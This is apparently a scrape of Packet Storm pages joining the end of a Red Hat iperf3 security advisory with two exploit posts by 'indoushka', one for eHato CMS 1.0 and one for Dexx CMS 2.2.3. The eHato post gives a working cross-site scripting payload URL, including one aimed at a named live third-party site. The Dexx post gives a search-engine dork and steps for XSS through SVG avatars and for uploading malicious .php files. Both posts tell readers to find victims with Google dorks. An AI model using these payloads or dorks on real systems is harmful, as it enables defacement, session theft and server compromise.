6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
iperf3-3.5-7.el8_8.src.rpm

aarch64:  
iperf3-3.5-7.el8_8.aarch64.rpm  
iperf3-debuginfo-3.5-7.el8_8.aarch64.rpm  
iperf3-debugsource-3.5-7.el8_8.aarch64.rpm

ppc64le:  
iperf3-3.5-7.el8_8.ppc64le.rpm  
iperf3-debuginfo-3.5-7.el8_8.ppc64le.rpm  
iperf3-debugsource-3.5-7.el8_8.ppc64le.rpm

s390x:  
iperf3-3.5-7.el8_8.s390x.rpm  
iperf3-debuginfo-3.5-7.el8_8.s390x.rpm  
iperf3-debugsource-3.5-7.el8_8.s390x.rpm

x86_64:  
iperf3-3.5-7.el8_8.i686.rpm  
iperf3-3.5-7.el8_8.x86_64.rpm  
iperf3-debuginfo-3.5-7.el8_8.i686.rpm  
iperf3-debuginfo-3.5-7.el8_8.x86_64.rpm  
iperf3-debugsource-3.5-7.el8_8.i686.rpm  
iperf3-debugsource-3.5-7.el8_8.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-38403  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk0qNaAAoJENzjgjWX9erEoW4P/3bPOtStFGt+KJqM32Dii0JP  
2thyH5EtuzidhUmQbLtRz5IzBBfbMu8FbjxOlDmMQeMh5NwQYJUf9E6Cl1LIBvAD  
qrCbvlRrTJWEf6ZVkBaRjl+jLDbgW1mrF5GoXo8l1Ebv4wrgSkMAV5rQfqdYy7k2  
pVMfaC1vjyNSR5rUgZwULudjLuihvndj44VXqB7QIDDyFosO2YdKjpTcc/Syqp6H  
ohmPkLX2WEoWKB98zeRFI71Hh7L0HoRcl0uXiV0DHrGAj5ObeoLO5+FAiQIWSDBg  
2XDjFJjmBu2d5KjkjQuH4RqVTxLe2Z1izL5FAXYW1fT+n4KL6xXdRK1i+BoVIeg1  
0+YFUg17J2pgQlDDA5YWLv1XVKIrf9GHLFo41pBgUSm03XsHXG80D1BljYXlPFAH  
e7b9bA0Onz1siKkXCT+7d7mBXjPpM4yQlcz20HY01it3zWBeOOX8Xfd8SzRy5SSc  
H58rXuExRrE8rub3XMi0qzutZj8Pc6/ftPDLzlQhfqsJvzxx+49rLKPGymNjBe3a  
zJ8WjSQMDKym0JqOOTaneuSd6qABHxGyFBdzMoNNpbfK2hQgcDT1NOkH53CuQTqy  
ZGpUn/Frd1RGO5GMmDpYr+knXZ7/2Z30xGiakLqpS9ruZ/y8BfbnAWidhfHCPR0b  
SsmhU0hyjcD7cv8zFvcO  
=RGFP  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4570-01

eHato CMS version 1.0 suffers from a cross site scripting vulnerability.

**eHato CMS 1.0 Cross Site Scripting**

Posted Aug 9, 2023

Authored by indoushka

eHato CMS version 1.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 288795acae37e9889703f9a9e13f4dc91e382a11ff20d9b6c617e50c574fefb2

Download | Favorite | View

**eHato CMS 1.0 Cross Site Scripting**

    ====================================================================================================================================| # Title     : eHato CMS 1.0 XSS Vulnerability                                                                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://www.ehato.com                                                                                              |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /news/news.asp?keyword=%25C3%25F6%25C1%25E4%25A6r%25B7j%25B4M'%22()%26%25<acx><ScRiPt%20>prompt(996317)</ScRiPt>&kind_id=&Page=2[+] http://wtatcs.orgtw/news/news.asp?keyword=%25C3%25F6%25C1%25E4%25A6r%25B7j%25B4M'%22()%26%25<acx><ScRiPt%20>prompt(996317)</ScRiPt>&kind_id=&Page=2Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,924)
*   Arbitrary (16,191)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,275)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,343)
*   DoS (23,415)
*   Encryption (2,369)
*   Exploit (51,833)
*   File Inclusion (4,221)
*   File Upload (973)
*   Firewall (821)
*   Info Disclosure (2,766)
*   Intrusion Detection (892)
*   Java (3,043)
*   JavaScript (858)
*   Kernel (6,666)
*   Local (14,447)
*   Magazine (586)
*   Overflow (12,690)
*   Perl (1,423)
*   PHP (5,142)
*   Proof of Concept (2,338)
*   Protocol (3,601)
*   Python (1,535)
*   Remote (30,753)
*   Root (3,579)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,639)
*   Security Tool (7,883)
*   Shell (3,180)
*   Shellcode (1,214)
*   Sniffer (894)
*   Spoof (2,206)
*   SQL Injection (16,361)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (664)
*   Vulnerability (31,765)
*   Web (9,661)
*   Whitepaper (3,749)
*   x86 (962)
*   XSS (17,926)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,810)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,418)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,709)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,803)
*   UNIX (9,286)
*   UnixWare (186)
*   Windows (6,568)
*   Other

eHato CMS 1.0 Cross Site Scripting

Dexx CMS HTML and Site Builder version 2.2.3 suffers from cross site scripting and arbitrary file upload vulnerabilities.

====================================================================================================================================  
| # Title     : Dexx CMS - HTML and Site Builder V2.2.3 Remote File Upload vulnerability                                           |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla Firefox 114.0.1 (64 bits)                                          |   
| # Vendor    : https://www.ezwsb.com/                                                                                             |    
| # Dork      : "Our award-winning templates are the most beautiful way to present your ideas online."                             |  
====================================================================================================================================

[+] P0C : 

[+] The script is based on Laravel framework so you can apply the vulnerability for the framework

    https://dl.packetstormsecurity.net/2301-exploits/laravel9470-disclose.txt

  [-] XSS via file upload :

[+] Dorking İn Google Or Other Search Enggine.

[+] Register as a member of the target site .

[+] After registering, log in and go to /account/settings .

[+] path : https://127.0.0.1/storage/avatars/9SCDIW0ntFJYqaP9IfrOqhJfzNoyukqmbEOtJxH8.svg 

[-] Unrestricted File Upload :

[+] Go to ( Dashboard/Projects/New)to create a new project or Choose a template for your project .

[+] Choose Edit Image and upload your malicious file .

[+] path : https://127.0.0.1/storage/projects/1628/iGqYdWiwCUZGShvwQ4p14VLzvxbey33IN85U/images/ogSIFm8ztsQv4BBEy9Ci96utafSBsu45oe1RhL3y.htm

           https://127.0.0.1/storage/projects/1628/iGqYdWiwCUZGShvwQ4p14VLzvxbey33IN85U/images/kNHGCajolk2LcxsEZq8Q5sGn9p7Pt7gO5nOO1zwz.txt

           https://127.0.0.1/storage/projects/1628/iGqYdWiwCUZGShvwQ4p14VLzvxbey33IN85U/images/50otMfIHgIlJz3OFyuBMjeOSKaXs9a49YLZuaMlK.jpg

                  https://127.0.0.1/storage/projects/26/7u3ps1joxTO0o1e3jZYfvb3klddh3GFzS1dh/images/kc4FLhcYIWBq7AhOHTpxWwjPxwKRe4vX8nmLBahh.php

====Greetings to :=========================================================================================================================  
| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh       |  
===========================================================================================================================================

Source

Packet Storm